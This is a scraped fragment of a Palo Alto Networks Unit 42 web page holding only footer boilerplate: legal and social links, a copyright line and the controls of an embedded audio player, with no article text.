* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
